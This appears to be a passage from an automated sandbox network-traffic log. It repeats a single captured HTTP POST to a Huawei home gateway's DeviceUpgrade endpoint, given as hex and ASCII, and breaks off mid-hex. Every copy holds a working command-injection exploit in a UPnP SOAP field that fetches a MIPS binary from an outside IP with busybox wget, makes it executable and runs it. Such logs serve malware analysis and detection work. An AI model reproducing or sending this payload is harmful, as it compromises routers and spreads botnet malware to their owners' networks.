6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 